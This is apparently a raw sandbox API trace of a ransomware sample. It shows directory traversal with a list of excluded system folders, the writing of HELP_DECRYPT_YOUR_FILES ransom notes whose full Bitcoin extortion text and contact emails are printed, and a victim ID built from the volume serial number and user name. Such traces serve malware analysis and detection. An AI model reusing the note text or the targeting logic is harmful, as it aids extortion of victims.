	[0169.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="appdata") returned 0x0
	[0169.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="application data") returned 0x0
	[0169.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.022] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="winnt") returned 0x0
	[0169.022] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.022] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="tmp") returned 0x0
	[0169.022] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.022] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="cache") returned 0x0
	[0169.022] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.022] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.022] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.023] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="webcache") returned 0x0
	[0169.023] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.023] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="inetcache") returned 0x0
	[0169.023] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.023] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="nvidia") returned 0x0
	[0169.023] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.023] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="packages") returned 0x0
	[0169.024] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.024] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="cookies") returned 0x0
	[0169.024] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.024] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="programdata") returned 0x0
	[0169.024] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0169.024] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0169.024] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x371b45ea, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x7e4597ae, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.024] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0169.025] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e4597ae, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e4597ae, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e4597ae, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0169.237] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e433760, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e433760, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e4597ae, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0169.237] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e433760, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e433760, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e4597ae, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0169.237] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0169.238] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0169.238] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShutdownLogger", cAlternateFileName="SHUTDO~1")) returned 0
	[0169.239] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0169.239] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0169.239] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf380d4, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf380d4, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3000000, dwReserved0=0x0, dwReserved1=0x0, cFileName="events00.rbs", cAlternateFileName="")) returned 1
	[0169.239] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc28f5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="events01.rbs", cAlternateFileName="")) returned 1
	[0169.239] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf5c28, dwReserved0=0x0, dwReserved1=0x0, cFileName="events10.rbs", cAlternateFileName="")) returned 1
	[0169.239] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2e147a, dwReserved0=0x0, dwReserved1=0x0, cFileName="events11.rbs", cAlternateFileName="")) returned 1
	[0169.240] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dbc436f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7dbc436f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7dbc436f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0169.240] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7db9e142, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7db9e142, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7dbc436f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0169.240] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalTraceStore", cAlternateFileName="LOCALT~1")) returned 1
	[0169.240] lstrcmpW (lpString1="LocalTraceStore", lpString2="..") returned 1
	[0169.240] lstrcmpW (lpString1="LocalTraceStore", lpString2=".") returned 1
	[0169.240] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0169.240] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0169.240] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="LocalTraceStore" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore"
	[0169.241] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore"
	[0169.241] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\"
	[0169.241] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\"
	[0169.241] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*.*"
	[0169.241] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0169.242] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*.*") returned 58
	[0169.242] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.242] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*.*", cchLength=0x3a | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*") returned 0x3a
	[0169.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="windows") returned 0x0
	[0169.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="boot") returned 0x0
	[0169.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="system volume information") returned 0x0
	[0169.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="temp") returned 0x0
	[0169.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="program files") returned 0x0
	[0169.246] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.246] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="appdata") returned 0x0
	[0169.246] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="application data") returned 0x0
	[0169.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="winnt") returned 0x0
	[0169.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="tmp") returned 0x0
	[0169.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="cache") returned 0x0
	[0169.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="webcache") returned 0x0
	[0169.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="inetcache") returned 0x0
	[0169.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.249] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="nvidia") returned 0x0
	[0169.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.249] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="packages") returned 0x0
	[0169.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.249] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="cookies") returned 0x0
	[0169.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.250] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\*.*", lpSrch="programdata") returned 0x0
	[0169.250] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.250] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0169.250] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0169.250] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0169.251] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore"
	[0169.251] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*.*"
	[0169.251] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.251] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.252] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\HELP_DECRYPT_YOUR_FILES.TXT") returned 82
	[0169.252] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.253] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0169.253] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0169.256] CloseHandle (hObject=0x388) returned 1
	[0169.257] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.258] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.258] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0169.260] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0169.260] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.260] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0169.260] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0169.260] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0169.261] CloseHandle (hObject=0x388) returned 1
	[0169.261] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.262] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.262] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0169.262] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\HELP_DECRYPT_YOUR_FILES.HTML") returned 83
	[0169.262] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.263] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0169.263] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0169.266] CloseHandle (hObject=0x388) returned 1
	[0169.266] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0169.267] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.268] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0169.269] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
